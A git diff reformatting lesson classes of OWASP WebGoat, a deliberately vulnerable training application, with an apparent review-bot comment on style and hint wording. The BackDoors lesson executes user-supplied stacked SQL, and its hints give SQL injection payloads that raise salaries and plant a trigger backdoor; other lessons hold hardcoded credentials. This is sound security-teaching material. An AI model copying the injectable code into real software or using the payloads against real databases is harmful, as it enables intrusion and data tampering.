- .setBorder(0).setWidth("90%").setAlign("center");
+ String user = s.getParser().getRawParameter(USER, users[0]);
+ String resource = s.getParser().getRawParameter(RESOURCE, resources[0]);
+ String credentials = getRoles(user).toString();
- if (s.isColor())
- {
- t.setBorder(1);
- }
+ Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
- TR tr = new TR();
- tr.addElement(new TD().addElement("Change user:"));
- tr.addElement(new TD().addElement(ECSFactory.makePulldown(USER, users, user, 1)));
- t.addElement(tr);
-
- // These two lines would allow the user to select the resource from a list
- // Didn't seem right to me so I made them type it in.
- // ec.addElement( new P().addElement( "Choose a resource:" ) );
- // ec.addElement( ECSFactory.makePulldown( RESOURCE, resources, resource, 1 ) );
- tr = new TR();
- tr.addElement(new TD().addElement("Select resource: "));
- tr.addElement(new TD().addElement(ECSFactory.makePulldown(RESOURCE, resources, resource, 1)));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD(" ").setColSpan(2).setAlign("center"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD(ECSFactory.makeButton("Check Access")).setColSpan(2).setAlign("center"));
- t.addElement(tr);
- ec.addElement(t);
-
- if (isAllowed(user, resource))
- {
- if (!getRoles(user).contains("Admin")
- && resource.equals("Account Manager"))
+ if (s.isColor())
 {
- makeSuccess(s);
+ t.setBorder(1);
 }
- s.setMessage("User " + user + " " + credentials
- + " was allowed to access resource " + resource);
- }
- else
- {
- s.setMessage("User " + user + " " + credentials
- + " did not have privilege to access resource "
- + resource);
- }
- }
- catch (Exception e)
+
+ TR tr = new TR();
+ tr.addElement(new TD().addElement("Change user:"));
+ tr.addElement(new TD().addElement(ECSFactory.makePulldown(USER, users, user, 1)));
+ t.addElement(tr);
+
+ // These two lines would allow the user to select the resource from a list
+ // Didn't seem right to me so I made them type it in.
+ // ec.addElement( new P().addElement( "Choose a resource:" ) );
+ // ec.addElement( ECSFactory.makePulldown( RESOURCE, resources, resource, 1 ) );
+ tr = new TR();
+ tr.addElement(new TD().addElement("Select resource: "));
+ tr.addElement(new TD().addElement(ECSFactory.makePulldown(RESOURCE, resources, resource, 1)));
+ t.addElement(tr);
+
+ tr = new TR();
+ tr.addElement(new TD(" ").setColSpan(2).setAlign("center"));
+ t.addElement(tr);
+
+ tr = new TR();
+ tr.addElement(new TD(ECSFactory.makeButton("Check Access")).setColSpan(2).setAlign("center"));
+ t.addElement(tr);
+ ec.addElement(t);
+
+ if (isAllowed(user, resource))
+ {
+ if (!getRoles(user).contains("Admin") && resource.equals("Account Manager"))
+ {
+ makeSuccess(s);
+ }
+ s.setMessage("User " + user + " " + credentials + " was allowed to access resource " + resource);
+ }
+ else
+ {
+ s.setMessage("User " + user + " " + credentials + " did not have privilege to access resource "
+ + resource);
+ }
+ } catch (Exception e)
 {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
+ s.setMessage("Error generating " + this.getClass().getName());
+ e.printStackTrace();
 }
-
+
 return (ec);
- }
+ }
+ /**
+ * Gets the category attribute of the RoleBasedAccessControl object
+ *
+ * @return The category value
+ */
- /**
- * Gets the category attribute of the RoleBasedAccessControl object
- *
- * @return The category value
- */
+ protected Category getDefaultCategory()
+ {
+ return Category.ACCESS_CONTROL;
+ }
- protected Category getDefaultCategory()
- {
- return Category.ACCESS_CONTROL;
- }
-
-
- /**
- * Gets the hints attribute of the RoleBasedAccessControl object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
+ /**
+ * Gets the hints attribute of the RoleBasedAccessControl object
+ *
+ * @return The hints value
+ */
+ protected List getHints(WebSession s)
+ {
 List hints = new ArrayList();
 hints.add("Many sites attempt to restrict access to
resources by role.");
 hints.add("Developers frequently make mistakes implementing this scheme.");
 hints.add("Attempt combinations of users, roles, and resources.");
 return hints;
- }
+ }
- private final static Integer DEFAULT_RANKING = new Integer(10);
+ private final static Integer DEFAULT_RANKING = new Integer(10);
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
-
- /**
- * Gets the resources attribute of the RoleBasedAccessControl object
- *
- * @param rl Description of the Parameter
- * @return The resources value
- */
- private List getResources(List rl)
- {
+ /**
+ * Gets the resources attribute of the RoleBasedAccessControl object
+ *
+ * @param rl
+ * Description of the Parameter
+ * @return The resources value
+ */
+ private List getResources(List rl)
+ {
 // return the resources allowed for these roles
 ArrayList list = new ArrayList();
-
+
 if (rl.contains(roles[0]))
 {
- list.add(resources[0]);
+ list.add(resources[0]);
 }
-
+
 if (rl.contains(roles[1]))
 {
- list.add(resources[1]);
- list.add(resources[5]);
+ list.add(resources[1]);
+ list.add(resources[5]);
 }
-
+
 if (rl.contains(roles[2]))
 {
- list.add(resources[2]);
- list.add(resources[3]);
+ list.add(resources[2]);
+ list.add(resources[3]);
 }
-
+
 if (rl.contains(roles[3]))
 {
- list.add(resources[4]);
- list.add(resources[5]);
+ list.add(resources[4]);
+ list.add(resources[5]);
 }
-
+
 return list;
- }
+ }
+ /**
+ * Gets the role attribute of the RoleBasedAccessControl object
+ *
+ * @param user
+ * Description of the Parameter
+ * @return The role value
+ */
- /**
- * Gets the role attribute of the RoleBasedAccessControl object
- *
- * @param user Description of the Parameter
- * @return The role value
- */
-
- private List getRoles(String user)
- {
+ private List getRoles(String user)
+ {
 ArrayList list = new ArrayList();
-
+
 if (user.equals(users[0]))
 {
- list.add(roles[0]);
+ list.add(roles[0]);
 }
 else
if (user.equals(users[1]))
 {
- list.add(roles[1]);
- list.add(roles[2]);
+ list.add(roles[1]);
+ list.add(roles[2]);
 }
 else if (user.equals(users[2]))
 {
- list.add(roles[0]);
- list.add(roles[2]);
+ list.add(roles[0]);
+ list.add(roles[2]);
 }
 else if (user.equals(users[3]))
 {
- list.add(roles[3]);
+ list.add(roles[3]);
 }
-
+
 return list;
- }
+ }
+ /**
+ * Gets the title attribute of the AccessControlScreen object
+ *
+ * @return The title value
+ */
- /**
- * Gets the title attribute of the AccessControlScreen object
- *
- * @return The title value
- */
-
- public String getTitle()
- {
+ public String getTitle()
+ {
 return ("Using an Access Control Matrix");
- }
+ }
+ // private final static ArrayList userList = new ArrayList(Arrays.asList(users));
+ // private final static ArrayList resourceList = new ArrayList(Arrays.asList(resources));
+ // private final static ArrayList roleList = new ArrayList(Arrays.asList(roles));
- // private final static ArrayList userList = new ArrayList(Arrays.asList(users));
- // private final static ArrayList resourceList = new ArrayList(Arrays.asList(resources));
- // private final static ArrayList roleList = new ArrayList(Arrays.asList(roles));
+ /**
+ * Please do not ever implement an access control scheme this way! But it's not the worst I've
+ * seen.
+ *
+ * @param user
+ * Description of the Parameter
+ * @param resource
+ * Description of the Parameter
+ * @return The allowed value
+ */
- /**
- * Please do not ever implement an access control scheme this way! But it's not the worst I've
- * seen.
- *
- * @param user Description of the Parameter
- * @param resource Description of the Parameter
- * @return The allowed value
- */
-
- private boolean isAllowed(String user, String resource)
- {
+ private boolean isAllowed(String user, String resource)
+ {
 List roles = getRoles(user);
 List resources = getResources(roles);
 return (resources.contains(resource));
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
+ }
+
+ public Element getCredits()
+ {
+ return super.getCustomCredits("", ASPECT_LOGO);
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
index 120dc556e..54a4be525 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 import java.sql.Connection;
@@ -6,7 +7,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -22,37 +22,35 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
- * @author Sherif Koussa Macadamian
- * Technologies.
+ * @author Sherif Koussa Macadamian Technologies.
 */
 public class BackDoors extends SequentialLessonAdapter
 {
@@ -63,8 +61,8 @@ public class BackDoors extends SequentialLessonAdapter
 private final static String SELECT_ST = "select userid, password, ssn, salary, email from employee where userid=";
- private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
- "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+ private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+ .setBorder(0).setHspace(0).setVspace(0);
 protected Element createContent(WebSession s)
 {
@@ -96,13 +94,14 @@ public class BackDoors extends SequentialLessonAdapter
 String[] arrSQL = userInput.split(";");
 Connection conn = DatabaseUtilities.getConnection(s);
 Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
+ ResultSet.CONCUR_READ_ONLY);
 if (arrSQL.length == 2)
 {
 statement.executeUpdate(arrSQL[1]);
 getLessonTracker(s).setStage(2);
- s.setMessage("You have succeeded in exploiting the vulnerable query and created another SQL statement. Now move to stage 2 to learn how to create a backdoor or a DB worm");
+ s
+ .setMessage("You have succeeded in exploiting the vulnerable query and created another SQL statement. Now move to stage 2 to learn how to create a backdoor or a DB worm");
 }
 ResultSet rs = statement.executeQuery(arrSQL[0]);
@@ -129,8 +128,7 @@ public class BackDoors extends SequentialLessonAdapter
 ec.addElement(t);
 }
 }
- }
- catch (Exception ex)
+ } catch (Exception ex)
 {
 ec.addElement(new PRE(ex.getMessage()));
 }
@@ -176,12 +174,10 @@ public class BackDoors extends SequentialLessonAdapter
 + " statements. The first is the system's while the second is totally yours.";
 instructions = instructions + " Your account ID is 101. This page allows you to see your password, ssn and salary.";
- instructions = instructions
- + " Try to inject another update to update salary to something higher";
+ instructions = instructions + " Try to inject another update to update salary to something higher";
 break;
 case 2:
- instructions = "Stage " + getStage(s)
- + ": Use String SQL Injection to inject a backdoor. ";
+ instructions = "Stage " + getStage(s) + ": Use String SQL Injection to inject a backdoor. ";
 instructions = instructions + " The second stage of this lesson is to teach you how to use a vulneable fields to inject the DB work or the backdoor.";
 instructions = instructions
@@ -248,8 +244,8 @@ public class BackDoors extends SequentialLessonAdapter
 hints.add("Your user id is 101. Use it to see your information");
 hints.add("A semi-colon usually ends a SQL statement and starts a new one.");
 hints.add("Try this 101 or 1=1; update employee set salary=100000");
- hints.add("For stage 2, Try 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON " +
- "employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid");
+ hints.add("For stage 2, Try 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON "
+ + "employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid");
 return hints;
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
index a7c17a555..f7ba35023 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -14,318 +14,281 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created October 28, 2003
 */
 public class BasicAuthentication extends SequentialLessonAdapter
 {
- private static final String EMPTY_STRING = "";
+ private static final String EMPTY_STRING = "";
- private static final String WEBGOAT_BASIC = "webgoat_basic";
+ private static final String WEBGOAT_BASIC = "webgoat_basic";
- private static final String AUTHORIZATION = "Authorization";
+ private static final String AUTHORIZATION = "Authorization";
- private static final String ORIGINAL_AUTH = "Original_Auth";
+ private static final String ORIGINAL_AUTH = "Original_Auth";
- private static final String ORIGINAL_USER = "Original.user";
+ private static final String ORIGINAL_USER = "Original.user";
- private static final String BASIC = "basic";
+ private static final String BASIC = "basic";
- private static final String JSESSIONID = "JSESSIONID";
+ private static final String JSESSIONID = "JSESSIONID";
- private final static String HEADER_NAME = "header";
+ private final static String HEADER_NAME = "header";
- private final static String HEADER_VALUE = "value";
+ private final static String HEADER_VALUE = "value";
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- return super.createStagedContent(s);
- }
-
-
-
protected Element doStage1(WebSession s) throws Exception - { - ElementContainer ec = new ElementContainer(); - - String headerName = null; - String headerValue = null; - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - headerName = new String(s.getParser().getStringParameter( - HEADER_NAME, EMPTY_STRING)); - headerValue = new String(s.getParser().getStringParameter( - HEADER_VALUE, EMPTY_STRING)); - - // - // FIXME: This won;t work for CBT, we need to use the UserTracker - //Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - if (headerName.equalsIgnoreCase(AUTHORIZATION) - && (headerValue.equals("guest:guest") || headerValue - .equals("webgoat:webgoat"))) - { - getLessonTracker(s).setStage(2); - return doStage2(s); - } - else - { - if (headerName.length() > 0 - && !headerName.equalsIgnoreCase(AUTHORIZATION)) - { - s - .setMessage("Basic Authentication header name is incorrect."); - } - if (headerValue.length() > 0 - && !(headerValue.equals("guest:guest") || headerValue - .equals("webgoat:webgoat"))) - { - s - .setMessage("Basic Authentication header value is incorrect."); - - } - } - // - - Table t = new Table(0).setCellSpacing(0).setCellPadding(0) - .setBorder(0); - if (s.isColor()) - { - t.setBorder(1); - } - - TR row1 = new TR(); - TR row2 = new TR(); - row1.addElement(new TD(new StringElement( - "What is the name of the authentication header: "))); - row2 - .addElement(new TD( - new StringElement( - "What is the decoded value of the authentication header: "))); - - row1.addElement(new TD(new Input(Input.TEXT, HEADER_NAME, - headerName.toString()))); - row2.addElement(new TD(new Input(Input.TEXT, HEADER_VALUE, - headerValue.toString()))); - - t.addElement(row1); - t.addElement(row2); - - ec.addElement(t); - ec.addElement(new P()); - - Element b = ECSFactory.makeButton("Submit"); - ec.addElement(b); - - } - catch (Exception e) - { - 
s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return super.createStagedContent(s); } - return (ec); - } - - - protected Element doStage2(WebSession s) throws Exception - { - ElementContainer ec = new ElementContainer(); - - try + protected Element doStage1(WebSession s) throws Exception { - if (s.getRequest().isUserInRole(WEBGOAT_BASIC)) - { - String originalUser = getLessonTracker(s).getLessonProperties() - .getProperty(ORIGINAL_USER, EMPTY_STRING); - getLessonTracker(s, originalUser).setCompleted(true); - getLessonTracker(s, originalUser).setStage(1); - getLessonTracker(s, originalUser).store(s, this); - makeSuccess(s); - s.setMessage("Close your browser and login as " + originalUser - + " to get your green stars back."); - return ec; - } - else - { - // If we are still in the ORIGINAL_USER role see if the Basic Auth header has been manipulated - String originalAuth = getLessonTracker(s).getLessonProperties() - .getProperty(ORIGINAL_AUTH, EMPTY_STRING); - String originalSessionId = getLessonTracker(s) - .getLessonProperties().getProperty(JSESSIONID, - s.getCookie(JSESSIONID)); + ElementContainer ec = new ElementContainer(); - // store the original user info in the BASIC properties files - if (originalSessionId.equals(s.getCookie(JSESSIONID))) + String headerName = null; + String headerValue = null; + try { - // Store the original user name in the "basic" user properties file. We need to use - // the original user to access the correct properties file to update status. 
- // store the initial auth header - getLessonTracker(s).getLessonProperties().setProperty( - JSESSIONID, originalSessionId); - getLessonTracker(s).getLessonProperties().setProperty( - ORIGINAL_AUTH, s.getHeader(AUTHORIZATION)); - getLessonTracker(s, BASIC).getLessonProperties() - .setProperty(ORIGINAL_USER, s.getUserName()); - getLessonTracker(s, BASIC).setStage(2); - getLessonTracker(s, BASIC).store(s, this, BASIC); + headerName = new String(s.getParser().getStringParameter(HEADER_NAME, EMPTY_STRING)); + headerValue = new String(s.getParser().getStringParameter(HEADER_VALUE, EMPTY_STRING)); + + // + // FIXME: This won;t work for CBT, we need to use the UserTracker + // Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + if (headerName.equalsIgnoreCase(AUTHORIZATION) + && (headerValue.equals("guest:guest") || headerValue.equals("webgoat:webgoat"))) + { + getLessonTracker(s).setStage(2); + return doStage2(s); + } + else + { + if (headerName.length() > 0 && !headerName.equalsIgnoreCase(AUTHORIZATION)) + { + s.setMessage("Basic Authentication header name is incorrect."); + } + if (headerValue.length() > 0 + && !(headerValue.equals("guest:guest") || headerValue.equals("webgoat:webgoat"))) + { + s.setMessage("Basic Authentication header value is incorrect."); + + } + } + // + + Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); + if (s.isColor()) + { + t.setBorder(1); + } + + TR row1 = new TR(); + TR row2 = new TR(); + row1.addElement(new TD(new StringElement("What is the name of the authentication header: "))); + row2.addElement(new TD(new StringElement("What is the decoded value of the authentication header: "))); + + row1.addElement(new TD(new Input(Input.TEXT, HEADER_NAME, headerName.toString()))); + row2.addElement(new TD(new Input(Input.TEXT, HEADER_VALUE, headerValue.toString()))); + + t.addElement(row1); + t.addElement(row2); + + ec.addElement(t); + ec.addElement(new P()); + + Element b = ECSFactory.makeButton("Submit"); + ec.addElement(b); + + } 
catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - s.setMessage("Congratulations, you have figured out the mechanics of basic authentication."); - s.setMessage("  - Now you must try to make WebGoat reauthenticate you as: "); - s.setMessage("    - username: basic"); - s.setMessage("    - password: basic"); - s.setMessage("Use the Basic Authentication Menu to start at login page."); - - // If the auth header is different but still the original user - tell the user - // that the original cookie was posted bak and basic auth uses the cookie before the - // authorization token - if (!originalAuth.equals("") - && !originalAuth.equals(s.getHeader(AUTHORIZATION))) - { - ec - .addElement("You're almost there! You've modified the " - + AUTHORIZATION - + " header but you are " - + "still logged in as " - + s.getUserName() - + ". Look at the request after you typed in the 'basic' " - + "user credentials and submitted the request. Remember the order of events that occur during Basic Authentication."); - } - else if (!originalSessionId.equals(s.getCookie(JSESSIONID))) - { - ec - .addElement("You're really close! Changing the session cookie caused the server to create a new session for you. This did not cause the server to reauthenticate you. " - + "When you figure out how to force the server to perform an authentication request, you have to authenticate as:

" - + "    user name: basic
" - + "    password: basic
"); - } - else - { - ec.addElement("Use the hints! One at a time..."); - } - - } - - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return (ec); } - return (ec); - } + protected Element doStage2(WebSession s) throws Exception + { + ElementContainer ec = new ElementContainer(); + try + { + if (s.getRequest().isUserInRole(WEBGOAT_BASIC)) + { + String originalUser = getLessonTracker(s).getLessonProperties() + .getProperty(ORIGINAL_USER, EMPTY_STRING); + getLessonTracker(s, originalUser).setCompleted(true); + getLessonTracker(s, originalUser).setStage(1); + getLessonTracker(s, originalUser).store(s, this); + makeSuccess(s); + s.setMessage("Close your browser and login as " + originalUser + " to get your green stars back."); + return ec; + } + else + { + // If we are still in the ORIGINAL_USER role see if the Basic Auth header has been + // manipulated + String originalAuth = getLessonTracker(s).getLessonProperties() + .getProperty(ORIGINAL_AUTH, EMPTY_STRING); + String originalSessionId = getLessonTracker(s).getLessonProperties() + .getProperty(JSESSIONID, s.getCookie(JSESSIONID)); - /** - * Gets the category attribute of the ForgotPassword object - * - * @return The category value - */ - protected Category getDefaultCategory() - { + // store the original user info in the BASIC properties files + if (originalSessionId.equals(s.getCookie(JSESSIONID))) + { + // Store the original user name in the "basic" user properties file. We need to + // use + // the original user to access the correct properties file to update status. 
+ // store the initial auth header + getLessonTracker(s).getLessonProperties().setProperty(JSESSIONID, originalSessionId); + getLessonTracker(s).getLessonProperties().setProperty(ORIGINAL_AUTH, s.getHeader(AUTHORIZATION)); + getLessonTracker(s, BASIC).getLessonProperties().setProperty(ORIGINAL_USER, s.getUserName()); + getLessonTracker(s, BASIC).setStage(2); + getLessonTracker(s, BASIC).store(s, this, BASIC); + } - return Category.AUTHENTICATION; - } + s.setMessage("Congratulations, you have figured out the mechanics of basic authentication."); + s.setMessage("  - Now you must try to make WebGoat reauthenticate you as: "); + s.setMessage("    - username: basic"); + s.setMessage("    - password: basic"); + s.setMessage("Use the Basic Authentication Menu to start at login page."); + // If the auth header is different but still the original user - tell the user + // that the original cookie was posted bak and basic auth uses the cookie before the + // authorization token + if (!originalAuth.equals("") && !originalAuth.equals(s.getHeader(AUTHORIZATION))) + { + ec + .addElement("You're almost there! You've modified the " + + AUTHORIZATION + + " header but you are " + + "still logged in as " + + s.getUserName() + + ". Look at the request after you typed in the 'basic' " + + "user credentials and submitted the request. Remember the order of events that occur during Basic Authentication."); + } + else if (!originalSessionId.equals(s.getCookie(JSESSIONID))) + { + ec + .addElement("You're really close! Changing the session cookie caused the server to create a new session for you. This did not cause the server to reauthenticate you. " + + "When you figure out how to force the server to perform an authentication request, you have to authenticate as:

" + + "    user name: basic
" + + "    password: basic
"); + } + else + { + ec.addElement("Use the hints! One at a time..."); + } - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - // int stage = getLessonTracker(session, BASIC).getStage(); + } - // switch ( stage ) - // { - // case 1: - hints - .add("Basic authentication uses a cookie to pass the credentials. " - + "Use a proxy to intercept the request. Look at the cookies."); - hints - .add("Basic authentication uses Base64 encoding to 'scramble' the " - + "user's login credentials."); - hints - .add("Basic authentication uses 'Authorization' as the cookie name to " - + "store the user's credentials."); - hints.add("Use WebScarab -> Tools -> Transcoder to Base64 decode the " - + "the value in the Authorization cookie."); - // break; - // case 2: - hints - .add("Basic authentication uses a cookie to pass the credentials. " - + "Use a proxy to intercept the request. Look at the cookies."); - hints - .add("Before the WebServer requests credentials from the client, the current " - + "session is checked for validitity."); - hints - .add("If the session is invalid the webserver will use the basic authentication credentials"); - hints - .add("If the session is invalid and the basic authentication credentials are invalid, " - + "new credentials will be requested from the client."); - hints - .add("Intercept the request and corrupt the JSESSIONID and the Authorization header."); - // break; - // } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } - return hints; - } + return (ec); + } - private final static Integer DEFAULT_RANKING = new Integer(100); + /** + * Gets the category attribute of the ForgotPassword object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.AUTHENTICATION; + } - protected Integer getDefaultRanking() - { - 
return DEFAULT_RANKING; - } + /** + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value + */ + public List getHints(WebSession s) + { + List hints = new ArrayList(); + // int stage = getLessonTracker(session, BASIC).getStage(); + // switch ( stage ) + // { + // case 1: + hints.add("Basic authentication uses a cookie to pass the credentials. " + + "Use a proxy to intercept the request. Look at the cookies."); + hints.add("Basic authentication uses Base64 encoding to 'scramble' the " + "user's login credentials."); + hints.add("Basic authentication uses 'Authorization' as the cookie name to " + "store the user's credentials."); + hints.add("Use WebScarab -> Tools -> Transcoder to Base64 decode the " + + "the value in the Authorization cookie."); + // break; + // case 2: + hints.add("Basic authentication uses a cookie to pass the credentials. " + + "Use a proxy to intercept the request. Look at the cookies."); + hints.add("Before the WebServer requests credentials from the client, the current " + + "session is checked for validitity."); + hints.add("If the session is invalid the webserver will use the basic authentication credentials"); + hints.add("If the session is invalid and the basic authentication credentials are invalid, " + + "new credentials will be requested from the client."); + hints.add("Intercept the request and corrupt the JSESSIONID and the Authorization header."); + // break; + // } + + return hints; + } + + private final static Integer DEFAULT_RANKING = new Integer(100); + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Basic Authentication"); + } - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Basic Authentication"); - } - } 
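Review bot: The reflowed comment in doStage2's `originalSessionId` branch now leaves a dangling `// use` line between `We need to` and `the original user`; rejoin it as `// Store the original user name in the "basic" user properties file. We need to use the` / `// original user to access the correct properties file to update status.`, and while there fix `won;t` → `won't` in doStage1's FIXME and `posted bak` → `posted back`. In doStage1, the `new String(...)` wrappers around `getStringParameter(...)` and the later `headerName.toString()` / `headerValue.toString()` are no-op copies of a String; `headerName = s.getParser().getStringParameter(HEADER_NAME, EMPTY_STRING);` reads the same and drops the noise. The hint strings in getHints describe `Authorization` as a cookie, while the lesson code itself reads it with `s.getHeader(AUTHORIZATION)` and treats `JSESSIONID` as the cookie; the hints should say request header so learners are not pointed at the wrong part of the request. The class's closing brace is not visible on the new side of this hunk, so the end of the type is assumed to follow unchanged.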
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java index c7d46d3ba..44c621b75 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.sql.Connection; @@ -6,7 +7,6 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -16,302 +16,294 @@ import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is 